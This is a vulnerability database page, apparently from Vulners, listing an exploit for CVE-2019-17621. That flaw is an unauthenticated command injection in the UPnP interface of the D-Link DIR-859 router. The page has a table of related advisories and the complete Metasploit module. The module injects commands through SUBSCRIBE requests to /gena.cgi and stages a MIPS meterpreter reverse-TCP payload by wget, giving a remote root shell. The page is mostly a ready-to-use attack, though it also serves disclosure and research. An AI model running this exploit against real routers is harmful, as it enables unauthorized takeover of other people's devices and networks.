D-Link DIR-859 Unauthenticated Remote Command Execution

🗓️ 22 Jan 2020 00:00:00Reported by Miguel Mendez ZType

packetstorm🔗 packetstormsecurity.com👁 152 Views

D-Link DIR-859 Unauthenticated Remote Command Execution via UPnP interfac

Reporter	Title	Published	Views	Family All 27
0day.today	D-Link DIR-859 Unauthenticated Remote Command Execution Exploit	23 Jan 202000:00	–	zdt
Gitee	Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform	8 Dec 202020:38	–	gitee
Gitee	Exploit for OS Command Injection in Dlink Dir-859_Firmware	14 Nov 202221:16	–	gitee
Gitee	Exploit for OS Command Injection in Dlink Dir-859_Firmware	27 Sep 202114:59	–	gitee
GithubExploit	Exploit for OS Command Injection in Dlink Dir-859_Firmware	20 Jul 202209:39	–	githubexploit
ATTACKERKB	CVE-2019-17621	28 Mar 201900:00	–	attackerkb
BDU FSTEC	The vulnerability of D-Link DIR-818Lx, DIR-822, DIR-823, DIR-859, DIR-865L, DIR-868L, DIR-869, DIR-880L, DIR-890L/R, DIR-885L/R, and DIR-895L/R routers stems from the failure to address the issue of eliminating special elements used in the operating system’s command set. This allows attackers to execute arbitrary commands on behalf of the root user in the target system.	11 Feb 202000:00	–	bdu_fstec
Circl	CVE-2019-17621	21 Jan 202013:41	–	circl
CISA KEV Catalog	D-Link DIR-859 Router Command Execution Vulnerability	29 Jun 202300:00	–	cisa_kev
CISA	CISA Adds Eight Known Exploited Vulnerabilities to Catalog	29 Jun 202312:00	–	cisa

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution',  
'Description' => %q{  
D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP  
interface. The vulnerability exists in /gena.cgi (function genacgi_main() in  
/htdocs/cgibin), which is accessible without credentials.  
},  
'Author' =>  
[  
'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit  
'Pablo Pollanco P.' # Vulnerability discovery and metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2019-17621' ],  
[ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]  
],  
'DisclosureDate' => 'Dec 24 2019',  
'Privileged' => true,  
'Platform' => 'linux',  
'Arch' => ARCH_MIPSBE,  
'DefaultOptions' =>  
{  
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',  
'CMDSTAGER::FLAVOR' => 'wget',  
'RPORT' => '49152'  
},  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'CmdStagerFlavor' => %w{ echo wget },  
'DefaultTarget' => 0,  
))  
  
end  
  
def execute_command(cmd, opts)  
callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s +  
":" + Rex::Text.rand_text_hex(4).to_i(16).to_s +  
"/" + Rex::Text.rand_text_alpha(3..12)  
begin  
send_request_raw({  
'uri' => "/gena.cgi?service=`#{cmd}`",  
'method' => 'SUBSCRIBE',  
'headers' =>  
{  
'Callback' => "<#{callback_uri}>",  
'NT' => 'upnp:event',  
'Timeout' => 'Second-1800',  
},  
})  
rescue ::Rex::ConnectionError  
fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")  
end  
end  
  
def exploit  
execute_cmdstager(linemax: 500)  
end  
end  
`

22 Jan 2020 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.93009